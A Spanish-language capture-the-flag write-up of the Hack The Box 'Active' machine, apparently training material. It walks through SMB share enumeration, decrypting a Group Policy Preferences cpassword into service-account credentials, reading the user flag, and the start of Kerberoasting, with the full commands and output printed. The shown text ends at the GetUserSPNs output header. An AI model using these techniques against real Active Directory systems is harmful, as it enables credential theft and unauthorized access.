Active [EASYπ’]
Dificultad: FΓ‘cil
1- Reconocimiento y escaneo
1.1 Ping
1.1 PingPING 10.10.10.100 (10.10.10.100) 56(84) bytes of data.
64 bytes from 10.10.10.100: icmp_seq=1 ttl=127 time=185 ms
--- 10.10.10.100 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 184.783/184.783/184.783/0.000 msPodemos notar que se trata de una maquina Windows, debido al TTL:
TTL <= 64 >>(Linux)
TTL <= 128 >> (Windows)1.2 Nmap
1.2 Nmapβ― nmap -sS -sV -sC -p- -open --min-rate 5000 -Pn -vvv 10.10.10.100 -oN escaneo.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-23 19:26 -03
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:26
Completed Parallel DNS resolution of 1 host. at 19:26, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:26
Scanning 10.10.10.100 [65535 ports]
Discovered open port 445/tcp on 10.10.10.100
Discovered open port 135/tcp on 10.10.10.100
Discovered open port 53/tcp on 10.10.10.100
Discovered open port 139/tcp on 10.10.10.100
Discovered open port 49158/tcp on 10.10.10.100
Discovered open port 5722/tcp on 10.10.10.100
Discovered open port 49154/tcp on 10.10.10.100
Discovered open port 49168/tcp on 10.10.10.100
Discovered open port 3269/tcp on 10.10.10.100
Discovered open port 464/tcp on 10.10.10.100
Discovered open port 49165/tcp on 10.10.10.100
Discovered open port 49155/tcp on 10.10.10.100
Discovered open port 49166/tcp on 10.10.10.100
Discovered open port 47001/tcp on 10.10.10.100
Discovered open port 49166/tcp on 10.10.10.100
Discovered open port 593/tcp on 10.10.10.100
Discovered open port 3268/tcp on 10.10.10.100
Discovered open port 593/tcp on 10.10.10.100
Discovered open port 9389/tcp on 10.10.10.100
Discovered open port 49153/tcp on 10.10.10.100
Discovered open port 49153/tcp on 10.10.10.100
Discovered open port 49152/tcp on 10.10.10.100
Discovered open port 88/tcp on 10.10.10.100
Discovered open port 88/tcp on 10.10.10.100
Discovered open port 49157/tcp on 10.10.10.100
Discovered open port 636/tcp on 10.10.10.100
Discovered open port 389/tcp on 10.10.10.100
Completed SYN Stealth Scan at 19:27, 15.72s elapsed (65535 total ports)
Initiating Service scan at 19:27
Scanning 23 services on 10.10.10.100
Service scan Timing: About 65.22% done; ETC: 19:28 (0:00:30 remaining)
Completed Service scan at 19:28, 61.62s elapsed (23 services on 1 host)
NSE: Script scanning 10.10.10.100.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:28
Completed NSE at 19:28, 9.57s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:28
Completed NSE at 19:28, 8.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:28
Completed NSE at 19:28, 0.01s elapsed
Nmap scan report for 10.10.10.100
Host is up, received user-set (0.17s latency).
Scanned at 2025-02-23 19:26:57 -03 for 96s
Not shown: 65487 closed tcp ports (reset), 25 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-02-23 22:27:22Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5722/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49165/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49166/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49168/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-02-23T22:28:22
|_ start_date: 2025-02-22T11:34:26
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
|_clock-skew: 1s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 40109/tcp): CLEAN (Couldn't connect)
| Check 2 (port 36443/tcp): CLEAN (Couldn't connect)
| Check 3 (port 38631/udp): CLEAN (Timeout)
| Check 4 (port 15484/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:28
Completed NSE at 19:28, 0.01s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:28
Completed NSE at 19:28, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:28
Completed NSE at 19:28, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.51 seconds
Raw packets sent: 76846 (3.381MB) | Rcvd: 71716 (2.869MB)Esta maquina es un entorno de directorio activo, tambien vemos varios puertos interesantes:
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-02-23 22:27:22Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5722/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49165/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49166/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49168/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPCLa maquina esta corriendo sobre un Windows Server 2008 R2 SP1 y tiene activo el servidor de nombres de dominio(Puerto 53), en la que podemos encontrar debido al escaneo el domionio "active.htb".
Por lo que para que la IP correspondiente apunte al dominio, vamos a modificar el archivo "/etc/hosts" con Vim, de tal manera que quedaria:
Podemos tambien ver que tenemos el puerto 445(microsoft-ds?) correspondiente a un servidor SMB, y el puerto 47001 correspondiente a un servidor web(Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP))
1.3 crackmapexec
1.3 crackmapexecβ― crackmapexec smb 10.10.10.100
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)1.4 smbmap
1.4 smbmapsmbmap -H 10.10.10.100[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS 2- ExplotaciΓ³n
2.1 ExplotaciΓ³n por SMB
2.1 ExplotaciΓ³n por SMBSi revisamos el escaneo de smbmap para listar los recursos compartidos del servicio de SMB, tenemos acceso al recurso "Replication" con permisos de lectura, vamos a ver que hay dentro del recurso compartido:
smbmap -H 10.10.10.100 -r Replication[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
./Replication
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 active.htb
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
[*] Closed 1 connections Vemos que hay un directorio llamado "active.htb", listemos el directorio para ver que hay dentro:
smbmap -H 10.10.10.100 -r Replication/active.htb[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
./Replicationactive.htb
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 DfsrPrivate
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 Policies
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 scripts
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
[*] Closed 1 connections Vemos que hay 3 directorios, luego de una investigaciΓ³n, el unico directorio donde podemos encontrar informaciΓ³n valiosa es "Policies", listemos para ver que hay dentro:
smbmap -H 10.10.10.100 -r Replication/active.htb/Policies[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
./Replicationactive.htb/Policies
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
[*] Closed 1 connectionsVemos 2 directorios, concretamente el que nos interesa es: "{31B2F340-016D-11D2-945F-00C04FB984F9}"
Veamos que hay dentro del directorio:
smbmap -H 10.10.10.100 -r Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
./Replicationactive.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 ..
fr--r--r-- 23 Sat Jul 21 07:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 Group Policy
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 USER
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
[*] Closed 1 connections Vamos a listar el directorio "MACHINE":
smbmap -H 10.10.10.100 -r Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
./Replicationactive.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 Microsoft
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 Preferences
fr--r--r-- 2788 Sat Jul 21 07:38:11 2018 Registry.pol
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
[*] Closed 1 connectionsAhora vamos a listar el directorio "Preferences":
smbmap -H 10.10.10.100 -r Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
./Replicationactive.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 Groups
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
[*] Closed 1 connectionsY por ultimo, vamos a listar el directorio "Groups":
smbmap -H 10.10.10.100 -r Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
./Replicationactive.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 07:37:44 2018 ..
fr--r--r-- 533 Sat Jul 21 07:38:11 2018 Groups.xml
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
[*] Closed 1 connections Hay un archivo con extensiΓ³n XML, vamos a bajarnos el archivo con el siguiente comando:
smbmap -H 10.10.10.100 --download Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xmlEjecutamos:
β― smbmap -H 10.10.10.100 --download Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml (533 bytes)
[+] File output to: /home/t0mz/CTF/active/10.10.10.100-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml
[*] Closed 1 connections El archivo se nos guardara con el nombre de la ruta de direcciones que seguimos dentro del recurso compartido, asi que vamos a renombrarlo:
β― mv 10.10.10.100-Replication_active.htb_Policies_\{31B2F340-016D-11D2-945F-00C04FB984F9\}_MACHINE_Preferences_Groups_Groups.xml Groups.xml
β― ls
ο
crackmapexec.txt ο
escaneo.txt ο‘ Groups.xml ο
ping.txt ο
smbmap.txtVamos a visualizar el contenido del archivo:
β― cat Groups.xml
ββββββββ¬ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β File: Groups.xml
ββββββββΌββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
1 β <?xml version="1.0" encoding="utf-8"?>
2 β <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06"
β uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbC
β pZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
3 β </Groups>
ββββββββ΄ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββHay unas posibles credenciales dentro de este archivo XML:
userName="active.htb\SVC_TGS"
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"La password esta encriptada con algΓΊn algoritmo de encriptado, vamos a desencriptarla
Para desencriptarla vamos a utilizar la herramienta de Kali llamda "gpp-decrypt" utilizando el siguiente comando:
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"Ejecutamos:
β― gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18De tal manera que el usuario y la password quedarian de la siguiente manera:
userName="active.htb\SVC_TGS"
cpassword="GPPstillStandingStrong2k18"Vamos a quitar el dominio "active.htb" dentro del userName:
userName="SVC_TGS"
cpassword="GPPstillStandingStrong2k18"Perfecto, ya tenemos las credenciales, ahora con crackmapexec, vamos a ver si las credenciales son validas con crackmapexec con el siguiente comando:
crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'Ejecutamos:
β― crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 Ahora vamos a ver los permisos que tendremos en los recursos compartidos con las credenciales que obtuvimos con el siguiente comando:
crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --sharesEjecutamos:
β― crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON READ Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL READ Logon server share
SMB 10.10.10.100 445 DC Users READ Podemos leer el recurso compartido de "Users", donde seguramente se encuentre la flag de usuario
2.2 ObtenciΓ³n de la flag de usuario
2.2 ObtenciΓ³n de la flag de usuarioVamos a listar los directorios del recurso compartido "Users" con smbmap y las credenciales que obtuvimos del archivo XML
Para eso, vamos a utilizar el siguiente comando:
smbmap -H 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -r UsersEjecutamos:
[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
./Users
dw--w--w-- 0 Sat Jul 21 11:39:20 2018 .
dw--w--w-- 0 Sat Jul 21 11:39:20 2018 ..
dr--r--r-- 0 Mon Jul 16 07:14:21 2018 Administrator
dr--r--r-- 0 Mon Jul 16 18:08:56 2018 All Users
dw--w--w-- 0 Mon Jul 16 18:08:47 2018 Default
dr--r--r-- 0 Mon Jul 16 18:08:56 2018 Default User
fr--r--r-- 174 Mon Jul 16 18:01:17 2018 desktop.ini
dw--w--w-- 0 Mon Jul 16 18:08:47 2018 Public
dr--r--r-- 0 Sat Jul 21 12:16:32 2018 SVC_TGS
[*] Closed 1 connectionsTendremos el directorio del usuario "SVC_TGS", vamos a listarlo:
smbmap -H 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -r Users/SVC_TGS[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
./UsersSVC_TGS
dr--r--r-- 0 Sat Jul 21 12:16:32 2018 .
dr--r--r-- 0 Sat Jul 21 12:16:32 2018 ..
dr--r--r-- 0 Sat Jul 21 12:14:20 2018 Contacts
dr--r--r-- 0 Sat Jul 21 12:14:42 2018 Desktop
dr--r--r-- 0 Sat Jul 21 12:14:28 2018 Downloads
dr--r--r-- 0 Sat Jul 21 12:14:50 2018 Favorites
dr--r--r-- 0 Sat Jul 21 12:15:00 2018 Links
dr--r--r-- 0 Sat Jul 21 12:15:23 2018 My Documents
dr--r--r-- 0 Sat Jul 21 12:15:40 2018 My Music
dr--r--r-- 0 Sat Jul 21 12:15:50 2018 My Pictures
dr--r--r-- 0 Sat Jul 21 12:16:05 2018 My Videos
dr--r--r-- 0 Sat Jul 21 12:16:20 2018 Saved Games
dr--r--r-- 0 Sat Jul 21 12:16:32 2018 Searches
[*] Closed 1 connections Ahora vamos al escritorio:
smbmap -H 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -r Users/SVC_TGS/Desktop[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
./UsersSVC_TGS/Desktop
dr--r--r-- 0 Sat Jul 21 12:14:42 2018 .
dr--r--r-- 0 Sat Jul 21 12:14:42 2018 ..
fw--w--w-- 34 Sat Feb 22 08:35:33 2025 user.txt
[*] Closed 1 connectionsAhi esta la flag, vamos a bajarnosla con el siguiente comando:
smbmap -H 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --download Users/SVC_TGS/Desktop/user.txtEjecutamos:
β― smbmap -H 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --download Users/SVC_TGS/Desktop/user.txt
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: Users\SVC_TGS\Desktop\user.txt (34 bytes)
[+] File output to: /home/t0mz/CTF/active/10.10.10.100-Users_SVC_TGS_Desktop_user.txt
[*] Closed 1 connections (Recordar cambiar el nombre de los archivos que nos bajamos de smbmap)
Ahora vamos a visualizar el contenido del archivo user.txt que contiene la flag para reclamarlo en Hack The Box
β― mv 10.10.10.100-Users_SVC_TGS_Desktop_user.txt user.txt
β― ls
ο
crackmapexec.txt ο
escaneo.txt ο‘ Groups.xml ο password ο
ping.txt ο
smbmap.txt ο
user.txt
β― cat user.txt
ββββββββ¬ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β File: user.txt
ββββββββΌββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
1 β 39ab1677a3ff895c301433570a1d57f7
ββββββββ΄ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ3- Escalado de privilegios
3.1 Kerberoasting
3.1 KerberoastingVamos a realizar un kerberoasting mediante tickets con el usuario SVC_TGS que logramos obtener, en resumen, le pedimos a la maquina con este usuario "SVC_TGS" un ticket, entonces el sistema nos lo va a dar en forma de hash, nosotros podemos utilizar John The Ripper o Hashcat para realizar fuerza bruta sobre ese hash, en mi caso utilizare John The Ripper
Para obtener el ticket en forma de hash, primero necesitamos tener sincronizada la hora de nuestro Kali, con la hora de la maquina objetivo, debido a problemas a la hora de la obtenciΓ³n del ticket en forma de hash, para eso tenemos una herramienta llamada "ntpdate", utilizaremos el siguiente comando:
(Si no tenemos "ntpdate" instalado, instalarlo con el gestor de paquetes aptitude, "sudo apt install ntpdate")
sudo ntpdate 10.10.10.100Ejecutamos:
β― sudo ntpdate 10.10.10.100
2025-02-23 23:30:31.528622 (-0300) +2.089291 +/- 0.100257 10.10.10.100 s1 no-leap
CLOCK: time stepped by 2.089291Ahora vamos a ver si tenemos permisos para obtener el ticket en forma de hash con la herramienta "impacket-GetUserSPNs" con el siguiente comando:
impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18El comando se estructuraria de la siguiente manera:
impacket-GetUserSPNs {Dominio o IP}/{Nombre del usuario}:{Password del usuario}Ejecutamos:
β― impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
